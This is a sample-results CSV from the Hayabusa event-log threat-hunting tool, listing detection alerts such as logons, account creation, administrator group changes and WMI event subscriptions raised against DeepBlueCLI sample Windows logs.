hayabusa/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
Tanaka Zakku 4a73a8c66c Sample results
2021-12-22 11:27:06 +09:00

4.6 MiB

Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath
2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
